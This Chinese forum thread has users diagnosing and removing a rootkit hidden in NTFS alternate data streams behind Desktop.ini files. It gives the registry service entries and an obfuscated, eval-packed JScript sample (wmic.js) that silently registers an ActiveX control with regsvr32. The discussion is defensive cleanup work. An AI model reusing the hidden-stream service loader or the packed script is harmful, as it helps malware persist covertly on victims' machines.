小红伞报的奇怪文件

xiaojinglf

2014英文版互联网套装3.29开始报奇怪

win7 64位系统

Virus or unwanted program 'TR/Rootkit.Gen [trojan]'
detected in file 'C:\Windows\Media\Desktop.ini:xinstaller.sys.
Action performed: Allow access

但是小红伞默认缺允许了访问


检查C:\Windows\Media\Desktop.ini文件是有的。

Desktop.ini:xinstaller.sys未找到

用AlternateStreamView扫描后发现。可以删除。但是此时千万不要先删除。
首先到注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\heng_pro，删除heng_pro这个项。重启计算机。然后在AlternateStreamView扫描并删除这个数据流

抓到的：

xiaojinglf

desktop.ini文件内是没有发现xinstaller.sys引用，系统中也没有这个xinstaller.sys

holdings

我的事server 2012 r2 和win8.1同样内核 npe也扫出来这个了， 另C:\Windows\media 下面有个qq.txt，里面有两行字幕和数字混乱排列的字符

qftest

xiaojinglf 发表于 2014-3-30 19:36
文件内也没有发现xinstaller.sys引用，系统中也没有这个xinstaller.sys

文本内容貌似正常
建议用PCHunter定位到这个文件，看文件名是否Desktop.ini:xinstaller.sys字样（正常应该没有冒号后面东西的），如果有冒号后面的字样就说明这是一个被隐藏的NTFS数据流，按comodo的说法这是一个典型的病毒行为，可以利用PCHunter的复制功能将该样本复制保存后上传让大家鉴定下

xiaojinglf

检查到注册表服务项目：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\heng_pro]
"Type"=dword:00000001
"Start"=dword:00000001
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,\
  44,00,4f,00,57,00,53,00,5c,00,4d,00,65,00,64,00,69,00,61,00,5c,00,44,00,65,\
  00,73,00,6b,00,74,00,6f,00,70,00,2e,00,69,00,6e,00,69,00,3a,00,78,00,69,00,\
  6e,00,73,00,74,00,61,00,6c,00,6c,00,65,00,72,00,2e,00,73,00,79,00,73,00,00,\
  00
"DisplayName"="heng_pro"
"WOW64"=dword:00000001

qftest

xiaojinglf 发表于 2014-4-2 09:11
检查到注册表服务项目：

Windows Registry Editor Version 5.00

果然是heng_pro，昨天我在样本区找到一个样本http://bbs.kafan.cn/thread-1601997-1-1.html，用记事本打开后就发现内容与这个目录有关，可能你电脑里的就是这货
又是Rootkit又是SYS，建议使用gmer全扫一次或直接尝试PE 360急救箱

xiaojinglf

我查出xinstaller.exe及xinstaller.dll是迅雷看看高清组件。
因此怀疑xinstaller.sys与迅雷是一家的
最近安装了迅雷极速版

xinstaller.sys在我的机器估计被杀。
但这个注册表引用的驱动不能直接删除注册表。否则重启会在输入登录密码后卡很久。然后进入桌面报错。

我采取如下措施解决：
首先卸载迅雷极速版
然后找到驱动将其设置为禁用
重启计算机后。删除这个注册表项。
再次重启未见异常

xiaojinglf

随后再次检查发现还有另外一个服务。这个服务对应的到 C:\WINDOWS\system32\wbem\Desktop.ini:wmic.js。
服务处于禁用状态。
同样删除注册表后无异常
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\aaobgeie]
"Type"=dword:00000010
"Start"=dword:00000004
"ErrorControl"=dword:00000001
"ImagePath"=C:\WINDOWS\System32\WScript.exe C:\WINDOWS\system32\wbem\Desktop.ini:wmic.js
"DisplayName"="aaobgeie"
"WOW64"=dword:00000001
"ObjectName"="LocalSystem"
"Description"="aaobgeie"

xiaojinglf

导出的wmic.js
文件内容：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5 a=3 4("2.0");a.1("7 9.b /8");6 a;',12,12,'Shell|run|Wscript|new|ActiveXObject|var|delete|regsvr32|s|COM_ActiveX||ocx'.split('|'),0,{}))

qftest

xiaojinglf 发表于 2014-4-3 08:03
导出的wmic.js
文件内容：

晓月大大你不使用回复功能我收不到消息提醒呀，还好我还记得这帖子的事
xinstaller.sys是不是迅雷看看的我判断不了，只是奇怪一个看视频的东西有什么必要Rootkit，这种高端货色建议大大还是远离较好
题外话，有机会与晓月大大交流比较兴奋啊，几年前最早用的小红伞就是大大的汉化版和工具箱，还学习过大大的使用教程